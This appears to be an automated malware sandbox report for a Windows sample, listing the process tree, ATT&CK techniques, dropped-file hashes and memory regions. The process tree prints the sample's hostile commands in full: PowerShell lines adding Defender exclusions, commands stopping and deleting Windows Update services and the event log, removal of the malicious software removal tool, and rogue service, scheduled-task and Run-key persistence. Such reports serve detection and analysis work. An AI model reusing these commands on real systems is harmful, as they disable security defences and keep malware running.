C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2844

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2916

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3516

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3576
- C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe
  "C:\Users\Admin\AppData\Local\Temp\210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe
    "C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:816
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3260
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4764
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4636
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3900
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:3256
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3204
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4072
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3528
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4556
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:828
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2828
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2308
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:4504
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1832
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2140
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2044
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2780
- - C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe
    "C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2212
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4248
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1828
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2524
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3472
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:3820
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1040
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:2716
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4796
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        
        PID:1588
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:3652
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:4776
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4948
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3772
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4292
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:636
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:5032
- - C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe
    "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3532
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2388
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3756

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:680

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3768

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2552

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4460

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:624

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 853b7bbf4ab599fcfddb4d63fe1eda58 bOv4goY3W0ai0jLffGy+6g.0.1.0.0.0
1⤵
PID:1960
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3872

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2940

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2548

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2068

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4040
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4788
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2716
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2344
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4980
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4484
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5032
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2668
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4516
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2076
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:924
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1284
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4700
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3232
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:2220
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4612
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:2252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7140ccf74fcbd9163b3c532a69f5ff6e

SHA1
57bc8d30e61acbda9dcde9d9434f559c9d38aac3

SHA256
c32be57fa8e9807007fa8bf35a630b893a4699e5251dbc179310b5a5640085b6

SHA512
292be07038e4f6c0151b6d2bdb6471abb96098dbd8eb97fff59608cb1b0a06c952727847227b0248113f7f93ed6aaca59f6727e222269ec20b6933eeaa7281df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oz5oup1k.v0z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Windows\System32\Tasks\dialersvc32

Filesize
3KB

MD5
1137f68ea9fd287af1a054188db5540d

SHA1
36b41bdde960a9ff48c4dcb1673b7c09f36a6c3b

SHA256
2d5caa81075b10b8726c142ef3b42b31717833d7054682fa163e8fec8ce79985

SHA512
bef5ccb55b0605a2f22c1dcabf1ace987a4cd4cee6a7a8300abbffe4f9dd56269343df42150d601e41b728b5335af1e57c54eb2c79bcb2c8b46639d14ee39576

Download Submit
C:\Windows\System32\Tasks\dialersvc64

Filesize
3KB

MD5
956a4f1e477aac7a7407368ccfd85fec

SHA1
6a3db4c4903fc53e3eee565283431aaf3165881a

SHA256
2b665836d6c198709381c91f047deddba677229e8b07908140e606ff7fe76e0a

SHA512
27b08ee4fd921e4333cbe7686460feee59827e99eb2b5bab895da3c849c49d268804ee7f2377572b2b8cda3594b6f16bf48d31ed43065ccd5312aed73eb76506

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
ab2fbbb642b157db90a729465587838e

SHA1
4d08fd71fac9ad7f0fe4548a5ed1b830c3501d89

SHA256
ba64b5299cc624f6844483ccea02d263a7c2a111d3ab488dbcbac3f68fcbdcdd

SHA512
76547f6e253b46cda15281e3162a77d441c252c41d063ceaacb451c1d5df4b49c7b2df996f0682a6c92c8eac310096a984b7fa764925896a7373fb5d3cb1925f

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
f917894b58298ddbfb9c6c15daaabd67

SHA1
a4d7286f04d5de7f5a733b16329da4d041f56e20

SHA256
301e37b5ef4c2be95c4038b6c71b103887a737237f534ad4a6398e2117ced05c

SHA512
819c5eac3d922e58ae7237c682fbdc0a3756456f127b73d1146bf95edcba248443fbb66ed64c3ae643296daf474ecb48e1029006a68881db76c6ef48f5ce7321

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
d54f43059dd01d7945efa4c06db9b9a7

SHA1
981712cec9d53f992f54540bdff0ccf3d3293490

SHA256
d5858f37305ba7712061a07cf0fe774e7d2ab46ca03c0e101e14ab706148511f

SHA512
0f530e6e5eb49c0429e8c5a43c610ddf97293ccb62ca50444abe0d562b4b16a0fe86ecbf8b3784e6485271506fc0059158873e42b65565dcae5cf01c19cb7966

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
c186c255a1d402769a74f041e43f0c7f

SHA1
bd640af6dc5fe1aafa6f7145993f9349f30f52e7

SHA256
aaa2c1ca31cf56b7bac546490d551bf2d1ca8cecf833df1ea4e479a8cd3bf1af

SHA512
7ead5307a86012838301fe1085237684b61f47207fff73ed77fa446724dd8ec8c0e2d2b92531aceb181d365a390e41053540aa91ef846603d8979480fa50bf6b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e7a623fcc311b5017c82b1181911569

SHA1
048d36afc6481760c53cff348c05744d98f3cce7

SHA256
9d5367afff64011b621c73c310c4b8bda206ec02726aadc0b17572d90888b25d

SHA512
3848945ad50086a6af42f9640bcebf3fecac3d8a6f2012eeb786a2def1a68f94848350bfec9115687b98f4e0bba643e807fbf1efd715d676e0d634f158e5d231

Download Submit
memory/612-102-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/612-101-0x000001C0F2080000-0x000001C0F20AB000-memory.dmp

Filesize
172KB

Download
memory/612-99-0x000001C0F2050000-0x000001C0F2074000-memory.dmp

Filesize
144KB

Download
memory/668-105-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/668-104-0x0000019A15310000-0x0000019A1533B000-memory.dmp

Filesize
172KB

Download
memory/732-114-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/732-113-0x000002B58CD60000-0x000002B58CD8B000-memory.dmp

Filesize
172KB

Download
memory/740-502-0x0000000004310000-0x0000000004376000-memory.dmp

Filesize
408KB

Download
memory/740-476-0x0000000003A80000-0x00000000040A8000-memory.dmp

Filesize
6.2MB

Download
memory/740-500-0x00000000039D0000-0x00000000039F2000-memory.dmp

Filesize
136KB

Download
memory/740-816-0x0000000006930000-0x0000000006ED4000-memory.dmp

Filesize
5.6MB

Download
memory/740-815-0x0000000005960000-0x0000000005982000-memory.dmp

Filesize
136KB

Download
memory/740-814-0x0000000005C30000-0x0000000005CC6000-memory.dmp

Filesize
600KB

Download
memory/740-501-0x00000000041B0000-0x0000000004216000-memory.dmp

Filesize
408KB

Download
memory/740-567-0x0000000004F80000-0x0000000004FCC000-memory.dmp

Filesize
304KB

Download
memory/740-514-0x0000000004380000-0x00000000046D4000-memory.dmp

Filesize
3.3MB

Download
memory/740-808-0x00000000062B0000-0x000000000692A000-memory.dmp

Filesize
6.5MB

Download
memory/740-561-0x0000000004980000-0x000000000499E000-memory.dmp

Filesize
120KB

Download
memory/740-809-0x0000000004E20000-0x0000000004E3A000-memory.dmp

Filesize
104KB

Download
memory/740-474-0x00000000033C0000-0x00000000033F6000-memory.dmp

Filesize
216KB

Download
memory/912-121-0x0000022C4BD30000-0x0000022C4BD5B000-memory.dmp

Filesize
172KB

Download
memory/912-122-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/944-117-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/944-116-0x000001215F130000-0x000001215F15B000-memory.dmp

Filesize
172KB

Download
memory/1020-111-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/1020-110-0x0000021DAC6F0000-0x0000021DAC71B000-memory.dmp

Filesize
172KB

Download
memory/1092-125-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/1092-124-0x00000196BA140000-0x00000196BA16B000-memory.dmp

Filesize
172KB

Download
memory/1096-147-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
